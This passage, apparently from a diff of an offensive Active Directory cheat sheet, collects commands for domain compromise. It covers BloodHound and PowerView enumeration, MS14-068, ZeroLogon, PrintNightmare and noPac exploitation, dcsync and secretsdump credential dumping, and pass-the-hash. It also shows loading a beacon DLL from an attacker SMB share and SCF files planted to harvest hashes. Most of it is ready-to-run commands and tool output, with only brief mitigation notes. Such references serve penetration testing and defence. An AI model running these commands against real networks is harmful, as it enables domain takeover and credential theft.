.\SharpHound.exe -c all --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 -d active.htb - .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 - - # or run the collector on the machine using Powershell - # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 - # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 - Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public - Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory - - # or remotely via BloodHound Python - # https://github.com/fox-it/BloodHound.py - pip install bloodhound - bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all - - # or locally/remotely from an ADExplorer snapshot from SysInternals (ADExplorer remains a legitimate binary signed by Microsoft, avoiding detection with security solutions) - # https://github.com/c3c/ADExplorerSnapshot.py - pip3 install --user . - ADExplorerSnapshot.py -o <*.json output folder path> - ``` -* Collect more data for certificates exploitation using Certipy - ```ps1 - certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound - certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound - certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123 - ``` -* use [OPENCYBER-FR/RustHound](https://github.com/OPENCYBER-FR/RustHound) - ```ps1 - # Windows with GSSAPI session - rusthound.exe -d domain.local --ldapfqdn domain - # Windows/Linux simple bind connection username:password - rusthound.exe -d domain.local -u user@domain.local -p Password123 -o output -z - # Linux with username:password and ADCS module for @ly4k BloodHound version - rusthound -d domain.local -u 'user@domain.local' -p 'Password123' -o /tmp/adcs --adcs -z - ``` - -Then import the zip/json files into the Neo4J database and query them. - -```powershell -root@payload$ apt install bloodhound - -# start BloodHound and the database -root@payload$ neo4j console -# or use docker -root@payload$ docker run -p7474:7474 -p7687:7687 -e NEO4J_AUTH=neo4j/bloodhound neo4j - -root@payload$ ./bloodhound --no-sandbox -Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j -``` - -You can add some custom queries like : -* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) -* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json) -* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json) -* [Certipy BloodHound Custom Queries from ly4k](https://github.com/ly4k/Certipy/blob/main/customqueries.json) - -Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. - - -### Using PowerView - -- **Get Current Domain:** `Get-NetDomain` -- **Enum Other Domains:** `Get-NetDomain -Domain ` -- **Get Domain SID:** `Get-DomainSID` -- **Get Domain Policy:** - ```powershell - Get-DomainPolicy - - #Will show us the policy configurations of the Domain about system access or kerberos - (Get-DomainPolicy)."system access" - (Get-DomainPolicy)."kerberos policy" - ``` -- **Get Domain Controlers:** - ```powershell - Get-NetDomainController - Get-NetDomainController -Domain - ``` -- **Enumerate Domain Users:** - ```powershell - Get-NetUser - Get-NetUser -SamAccountName - Get-NetUser | select cn - Get-UserProperty - - #Check last password change - Get-UserProperty -Properties pwdlastset - - #Get a spesific "string" on a user's attribute - Find-UserField -SearchField Description -SearchTerm "wtver" - - #Enumerate user logged on a machine - Get-NetLoggedon -ComputerName - - #Enumerate Session Information for a machine - Get-NetSession -ComputerName - - #Enumerate domain machines of the current/specified domain where specific users are logged into - Find-DomainUserLocation -Domain | Select-Object UserName, SessionFromName - ``` -- **Enum Domain Computers:** - ```powershell - Get-NetComputer -FullData - Get-DomainGroup - - #Enumerate Live machines - Get-NetComputer -Ping - ``` -- **Enum Groups and Group Members:** - ```powershell - Get-NetGroupMember -GroupName "" -Domain - - #Enumerate the members of a specified group of the domain - Get-DomainGroup -Identity | Select-Object -ExpandProperty Member - - #Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences - Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName - ``` -- **Enumerate Shares** - ```powershell - #Enumerate Domain Shares - Find-DomainShare - - #Enumerate Domain Shares the current user has access - Find-DomainShare -CheckShareAccess - ``` -- **Enum Group Policies:** - ```powershell - Get-NetGPO - - # Shows active Policy on specified machine - Get-NetGPO -ComputerName - Get-NetGPOGroup - - #Get users that are part of a Machine's local Admin group - Find-GPOComputerAdmin -ComputerName - ``` -- **Enum OUs:** - ```powershell - Get-NetOU -FullData - Get-NetGPO -GPOname - ``` -- **Enum ACLs:** - ```powershell - # Returns the ACLs associated with the specified account - Get-ObjectAcl -SamAccountName -ResolveGUIDs - Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose - - #Search for interesting ACEs - Invoke-ACLScanner -ResolveGUIDs - - #Check the ACLs associated with a specified path (e.g smb share) - Get-PathAcl -Path "\\Path\Of\A\Share" - ``` -- **Enum Domain Trust:** - ```powershell - Get-NetDomainTrust - Get-NetDomainTrust -Domain - ``` -- **Enum Forest Trust:** - ```powershell - Get-NetForestDomain - Get-NetForestDomain Forest - - #Domains of Forest Enumeration - Get-NetForestDomain - Get-NetForestDomain Forest - - #Map the Trust of the Forest - Get-NetForestTrust - Get-NetDomainTrust -Forest - ``` -- **User Hunting:** - ```powershell - #Finds all machines on the current domain where the current user has local admin access - Find-LocalAdminAccess -Verbose - - #Find local admins on all machines of the domain: - Invoke-EnumerateLocalAdmin -Verbose - - #Find computers were a Domain Admin OR a specified user has a session - Invoke-UserHunter - Invoke-UserHunter -GroupName "RDPUsers" - Invoke-UserHunter -Stealth - - #Confirming admin access: - Invoke-UserHunter -CheckAccess - ``` - :heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \ - I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> - Profit! - - [PowerView 3.0 Tricks](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) - -### Using AD Module - -- **Get Current Domain:** `Get-ADDomain` -- **Enum Other Domains:** `Get-ADDomain -Identity ` -- **Get Domain SID:** `Get-DomainSID` -- **Get Domain Controlers:** - - ```powershell - Get-ADDomainController - Get-ADDomainController -Identity - ``` - -- **Enumerate Domain Users:** - ```powershell - Get-ADUser -Filter * -Identity -Properties * - - #Get a spesific "string" on a user's attribute - Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description - ``` -- **Enum Domain Computers:** - ```powershell - Get-ADComputer -Filter * -Properties * - Get-ADGroup -Filter * - ``` -- **Enum Domain Trust:** - ```powershell - Get-ADTrust -Filter * - Get-ADTrust -Identity - ``` -- **Enum Forest Trust:** - ```powershell - Get-ADForest - Get-ADForest -Identity - - #Domains of Forest Enumeration - (Get-ADForest).Domains - ``` - - **Enum Local AppLocker Effective Policy:** - ```powershell - Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections - ``` - -### Other Interesting Commands - -- **Find Domain Controllers** - ```ps1 - nslookup domain.com - nslookup -type=srv _ldap._tcp.dc._msdcs..com - nltest /dclist:domain.com - Get-ADDomainController -filter * | Select-Object name - gpresult /r - $Env:LOGONSERVER - echo %LOGONSERVER% - ``` - - -## From CVE to SYSTEM shell on DC - -> Sometimes you will find a Domain Controller without the latest patches installed, use the newest CVE to gain a SYSTEM shell on it. If you have a "normal user" shell on the DC you can also try to elevate your privileges using one of the methods listed in [Windows - Privilege Escalation](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) - - -### MS14-068 Checksum Validation - -This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine. - -* RPCClient - ```powershell - rpcclient $> lookupnames john.smith - john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1) - ``` -* WMI - ```powershell - wmic useraccount get name,sid - Administrator S-1-5-21-3415849876-833628785-5197346142-500 - Guest S-1-5-21-3415849876-833628785-5197346142-501 - Administrator S-1-5-21-297520375-2634728305-5197346142-500 - Guest S-1-5-21-297520375-2634728305-5197346142-501 - krbtgt S-1-5-21-297520375-2634728305-5197346142-502 - lambda S-1-5-21-297520375-2634728305-5197346142-1110 - ``` -* Powerview - ```powershell - Convert-NameToSid high-sec-corp.localkrbtgt - S-1-5-21-2941561648-383941485-1389968811-502 - ``` -* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid` - -```bash -Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 -``` - -Generate a ticket with `metasploit` or `pykek` - -```powershell -Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum - Name Current Setting Required Description - ---- --------------- -------- ----------- - DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL - PASSWORD P@ssw0rd yes The Domain User password - RHOSTS 10.10.10.10 yes The target address range or CIDR identifier - RPORT 88 yes The target port - Timeout 10 yes The TCP timeout to establish connection and read data - USER lambda yes The Domain User - USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000 -``` - -```powershell -# Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek -$ git clone https://github.com/SecWiki/windows-kernel-exploits -$ python ./ms14-068.py -u @ -s -d -p -$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org -$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10 -$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066 --1105 - [+] Building AS-REQ for msfdc01.metasploitable.local... Done! - [+] Sending AS-REQ to msfdc01.metasploitable.local... Done! - [+] Receiving AS-REP from msfdc01.metasploitable.local... Done! - [+] Parsing AS-REP from msfdc01.metasploitable.local... Done! - [+] Building TGS-REQ for msfdc01.metasploitable.local... Done! - [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done! - [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done! - [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done! - [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done! -``` - -Then use `mimikatz` to load the ticket. - -```powershell -mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" -``` - - -#### Mitigations - -* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780 - - -### ZeroLogon - -> CVE-2020-1472 - -White Paper from Secura : https://www.secura.com/pathtoimg.php?id=2055 - -Exploit steps from the white paper - -1. Spoofing the client credential -2. Disabling signing and sealing -3. Spoofing a call -4. Changing a computer's AD password to null -5. From password change to domain admin -6. :warning: reset the computer's AD password in a proper way to avoid any Deny of Service - -* `cve-2020-1472-exploit.py` - Python script from [dirkjanm](https://github.com/dirkjanm) - ```powershell - # Check (https://github.com/SecuraBV/CVE-2020-1472) - proxychains python3 zerologon_tester.py DC01 172.16.1.5 - - $ git clone https://github.com/dirkjanm/CVE-2020-1472.git - - # Activate a virtual env to install impacket - $ python3 -m venv venv - $ source venv/bin/activate - $ pip3 install . - - # Exploit the CVE (https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py) - proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5 - - # Find the old NT hash of the DC - proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL' - - # Restore password from secretsdump - # secretsdump will automatically dump the plaintext machine password (hex encoded) - # when dumping the local registry secrets on the newest version - python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3 - deactivate - ``` - -* `nccfsas` - .NET binary for Cobalt Strike's execute-assembly - ```powershell - git clone https://github.com/nccgroup/nccfsas - # Check - execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local - - # Resetting the machine account password - execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset - - # Testing from a non Domain-joined machine - execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch - - # Now reset the password back - ``` - -* `Mimikatz` - 2.2.0 20200917 Post-Zerologon - ```powershell - privilege::debug - # Check for the CVE - lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ - - # Exploit the CVE and set the computer account's password to "" - lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit - - # Execute dcsync to extract some hashes - lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm - lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm - - # Pass The Hash with the extracted Domain Admin hash - sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN - - # Use IP address instead of FQDN to force NTLM with Windows APIs - # Reset password to Waza1234/Waza1234/Waza1234/ - # https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584 - lsadump::postzerologon /target:10.10.10.10 /account:DC01$ - ``` - -* `CrackMapExec` - only check - ```powershell - crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon - ``` - -A 2nd approach to exploit zerologon is done by relaying authentication. - -This technique, [found by dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon), requires more prerequisites but has the advantage of having no impact on service continuity. -The following prerequisites are needed: -* A domain account -* One DC running the `PrintSpooler` service -* Another DC vulnerable to zerologon - -* `ntlmrelayx` - from Impacket and any tool such as [`printerbug.py`](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) - ```powershell - # Check if one DC is running the PrintSpooler service - rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv" - - # Setup ntlmrelay in one shell - ntlmrelayx.py -t dcsync://DC01.LAB.LOCAL -smb2support - - #Trigger printerbug in 2nd shell - python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12 - ``` - -### PrintNightmare - -> CVE-2021-1675 / CVE-2021-34527 - -The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`. -The exploit will execute the DLL either from the local filesystem or a remote share. - -Requirements: -* **Spooler Service** enabled (Mandatory) -* Server with patches < June 2021 -* DC with `Pre Windows 2000 Compatibility` group -* Server with registry key `HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint\NoWarningNoElevationOnInstall` = (DWORD) 1 -* Server with registry key `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA` = (DWORD) 0 - - -**Detect the vulnerability**: -* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py) - ```ps1 - python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR' - Protocol: [MS-RPRN]: Print System Remote Protocol - ``` -* [It Was All A Dream](https://github.com/byt3bl33d3r/ItWasAllADream) - ```ps1 - git clone https://github.com/byt3bl33d3r/ItWasAllADream - cd ItWasAllADream && poetry install && poetry shell - itwasalladream -u user -p Password123 -d domain 10.10.10.10/24 - docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10 - ``` - -**Payload Hosting**: -* The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): -```ps1 -python3 ./smbserver.py share /tmp/smb/ -``` -* Using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host): -```ps1 -Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable -``` -* Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights): -```ps1 -SharpWebServer.exe port=8888 dir=c:\users\public verbose=true -``` -When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll` -WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav: -```ps1 -cme smb -u user -p password -d domain.local -M webdav [TARGET] -``` - -**Trigger the exploit**: - -* [SharpNightmare](https://github.com/cube0x0/CVE-2021-1675) - ```powershell - # require a modified Impacket: https://github.com/cube0x0/impacket - python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' - python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll' - ## LPE - SharpPrintNightmare.exe C:\addCube.dll - ## RCE using existing context - SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20' - ## RCE using runas /netonly - SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123 - ``` -* [Invoke-Nightmare](https://github.com/calebstewart/CVE-2021-1675) - ```powershell - ## LPE only (PS1 + DLL) - Import-Module .\cve-2021-1675.ps1 - Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default - Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*" - Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll" - ``` -* [Mimikatz v2.2.0-20210709+](https://github.com/gentilkiwi/mimikatz/releases) - ```powershell - ## LPE - misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll - ## RCE - misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50 - ``` -* [PrintNightmare - @outflanknl](https://github.com/outflanknl/PrintNightmare) - ```powershell - PrintNightmare [target ip or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password] - ``` - -**Debug informations** - -| Error | Message | Debug | -|--------|---------------------|------------------------------------------| -| 0x5 | `rpc_s_access_denied` | Permissions on the file in the SMB share | -| 0x525 | `ERROR_NO_SUCH_USER` | The specified account does not exist. | -| 0x180 | unknown error code | Share is not SMB2 | - - -### samAccountName spoofing - -> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a ST to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid ST for the domain controller. - -**Requirements** - -* MachineAccountQuota > 0 - -**Check for exploitation** - -0. Check the MachineAccountQuota of the account - ```powershell - crackmapexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ - StandIn.exe --object ms-DS-MachineAccountQuota=* - ``` -1. Check if the DC is vulnerable - ```powershell - crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac - ``` - -**Exploitation** - -0. Create a computer account - ```powershell - impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' - - powermad@windows> . .\Powermad.ps1 - powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force - powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose - - sharpmad@windows> Sharpmad.exe MAQ -Action new -MachineAccount ControlledComputer -MachinePassword ComputerPassword - ``` -1. Clear the controlled machine account `servicePrincipalName` attribute - ```ps1 - impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController - - powershell@windows> . .\Powerview.ps1 - powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose - ``` -2. (CVE-2021-42278) Change the controlled machine account `sAMAccountName` to a Domain Controller's name without the trailing `$` - ```ps1 - # https://github.com/SecureAuthCorp/impacket/pull/1224 - impacket@linux> renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password' - - powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose - ``` -3. Request a TGT for the controlled machine account - ```ps1 - impacket@linux> getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword' - - cmd@windows> Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap - ``` -4. Reset the controlled machine account sAMAccountName to its old value - ```ps1 - impacket@linux> renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password' - - powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose - ``` -5. (CVE-2021-42287) Request a service ticket with `S4U2self` by presenting the TGT obtained before - ```ps1 - # https://github.com/SecureAuthCorp/impacket/pull/1202 - impacket@linux> KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController' - - cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT] - ``` -6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'` - -Automated exploitation: - -* [cube0x0/noPac](https://github.com/cube0x0/noPac) - Windows - ```powershell - noPac.exe scan -domain htb.local -user user -pass 'password123' - noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt - noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator - ``` -* [Ridter/noPac](https://github.com/Ridter/noPac) - Linux - ```ps1 - python noPac.py 'domain.local/user' -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0' -dc-ip 10.10.10.10 -use-ldap -dump - ``` -* [WazeHell/sam-the-admin](https://github.com/WazeHell/sam-the-admin) - ```ps1 - $ python3 sam_the_admin.py "domain/user:password" -dc-ip 10.10.10.10 -shell - [*] Selected Target dc.caltech.white - [*] Total Domain Admins 11 - [*] will try to impersonat gaylene.dreddy - [*] Current ms-DS-MachineAccountQuota = 10 - [*] Adding Computer Account "SAMTHEADMIN-11$" - [*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL - [*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL. - [*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white - [*] SAMTHEADMIN-11$ sAMAccountName == dc - [*] Saving ticket in dc.ccache - [*] Resting the machine account to SAMTHEADMIN-11$ - [*] Restored SAMTHEADMIN-11$ sAMAccountName to original value - [*] Using TGT from cache - [*] Impersonating gaylene.dreddy - [*] Requesting S4U2self - [*] Saving ticket in gaylene.dreddy.ccache - [!] Launching semi-interactive shell - Careful what you execute - C:\Windows\system32>whoami - nt authority\system - ``` -* [ly4k/Pachine](https://github.com/ly4k/Pachine) - ```powershell - usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local] - [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip] - [domain/]username[:password] - $ python3 pachine.py -dc-host dc.domain.local -scan 'domain.local/john:Passw0rd!' - $ python3 pachine.py -dc-host dc.domain.local -spn cifs/dc.domain.local -impersonate administrator 'domain.local/john:Passw0rd!' - $ export KRB5CCNAME=$PWD/administrator@domain.local.ccache - $ impacket-psexec -k -no-pass 'domain.local/administrator@dc.domain.local' - ``` - -**Mitigations**: -* [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520) -* [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9) -* [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7) -* [KB5007205 - Windows Server 2022](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007205-os-build-20348-350-af102e6f-cc7c-4cd4-8dc2-8b08d73d2b31) -* [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e) -* [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041) - - -## Open Shares - -> Some shares can be accessible without authentication, explore them to find some juicy files - -* [ShawnDEvans/smbmap - a handy SMB enumeration tool](https://github.com/ShawnDEvans/smbmap) - ```powershell - smbmap -H 10.10.10.10 # null session - smbmap -H 10.10.10.10 -R # recursive listing - smbmap -H 10.10.10.10 -u invaliduser # guest smb session - smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*" - ``` - -* [byt3bl33d3r/pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) - ```powershell - pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share - pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$ - ls # list files - cd # move inside a folder - get # download files - put # replace a file - ``` - -* [SecureAuthCorp/smbclient from Impacket](https://github.com/SecureAuthCorp/impacket) - ```powershell - smbclient -I 10.10.10.100 -L ACTIVE -N -U "" - Sharename Type Comment - --------- ---- ------- - ADMIN$ Disk Remote Admin - C$ Disk Default share - IPC$ IPC Remote IPC - NETLOGON Disk Logon server share - Replication Disk - SYSVOL Disk Logon server share - Users Disk - use Sharename # select a Sharename - cd Folder # move inside a folder - ls # list files - ``` - -* [smbclient - from Samba, ftp-like client to access SMB/CIFS resources on servers](#) - ```powershell - smbclient -U username //10.0.0.1/SYSVOL - smbclient //10.0.0.1/Share - - # Download a folder recursively - smb: \> mask "" - smb: \> recurse ON - smb: \> prompt OFF - smb: \> lcd '/path/to/go/' - smb: \> mget * - ``` - - -* [SnaffCon/Snaffler - a tool for pentesters to help find delicious candy](https://github.com/SnaffCon/Snaffler) - ```ps1 - snaffler.exe -s - snaffler.log - - # Snaffle all the computers in the domain - ./Snaffler.exe -d domain.local -c -s - - # Snaffle specific computers - ./Snaffler.exe -n computer1,computer2 -s - ​ - # Snaffle a specific directory - ./Snaffler.exe -i C:\ -s - ``` - - -## SCF and URL file attack against writeable share - -Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop) - -```ps1 -# Farmer to receive auth -farmer.exe [seconds] [output] -farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely -farmer.exe 8888 60 # one minute - -# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks -crop.exe [options] -Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico -Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec -``` - -### SCF Files - -Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0` - -```powershell -[Shell] -Command=2 -IconFile=\\10.10.10.10\Share\test.ico -[Taskbar] -Command=ToggleDesktop -``` - -Using [`crackmapexec`](https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/modules/slinky.py): - -```ps1 -crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o 